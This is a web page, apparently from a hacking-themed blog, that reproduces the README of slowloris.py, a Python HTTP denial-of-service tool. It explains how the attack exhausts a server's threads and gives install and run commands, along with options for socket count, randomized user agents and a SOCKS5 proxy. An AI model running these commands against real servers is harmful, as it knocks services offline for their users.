Press ESC to close

slowloris.py - Simple Slowloris in Python

slowloris.py - Simple Slowloris in Python

What is Slowloris?

Slowloris is an HTTP Denial of Service (DoS) attack that affects threaded servers. It works by opening many HTTP connections to the target server and sending partial requests periodically to keep the connections open. This prevents the server from handling legitimate connections, effectively causing a DoS.

How Slowloris Works:

  1. Start making lots of HTTP requests.
  2. Send headers periodically (every ~15 seconds) to keep the connections open.
  3. Never close the connection unless the server does so. If the server closes a connection, create a new one and continue the process.

This exhausts the server's thread pool, preventing it from responding to other users.

How to Install and Run Slowloris

You can install slowloris either by cloning the git repository or using pip. Here's how:

Using Pip

sudo pip3 install slowloris
slowloris example.com

That's all it takes to install and run slowloris.py.

Using Git

git clone https://github.com/gkbrk/slowloris.git
cd slowloris
python3 slowloris.py example.com

SOCKS5 Proxy Support

To use the -x option for connecting via a SOCKS5 proxy, you will need to install the PySocks library:

sudo pip3 install PySocks

Then you can use:

slowloris -x --proxy-host <host> --proxy-port <port> example.com

Configuration Options

You can modify slowloris' behavior using command-line arguments. Run slowloris -h for the latest help documentation. Key options include:

  • -p, --port: Port of webserver (default is 80)
  • -s, --sockets: Number of sockets to use in the test
  • -v, --verbose: Increases logging output
  • -ua, --randuseragents: Randomizes user-agents with each request
  • -x, --useproxy: Use a SOCKS5 proxy for connecting
  • --https: Use HTTPS for the requests
  • --sleeptime: Time to sleep between each header sent

Citation

If you found this work useful, please cite it as:

@article{gkbrkslowloris,
  title = "Slowloris",
  author = "Gokberk Yaltirakli",
  journal = "github.com",
  year = "2015",
  url = "https://github.com/gkbrk/slowloris"
}

License

The code is licensed under the MIT License.

Disclaimer

This tool is for educational purposes only. Usage of slowloris.py for attacking targets without prior mutual consent is illegal. Developers assume no liability and are not responsible for any misuse or damage caused by this program.

Mr Cyber Hater

Leave a comment

Your email address will not be published. Required fields are marked *

Mr Cyber Hater Mr Cyber Hater

Hello, We’re content writer who is fascinated by content fashion, celebrity and lifestyle. We helps clients bring the right content to the right people.

Tag Clouds

#Information gathering #DDoS #Wordpress Hacking #sqli #Wifi hacking
Your experience on this site will be improved by allowing cookies.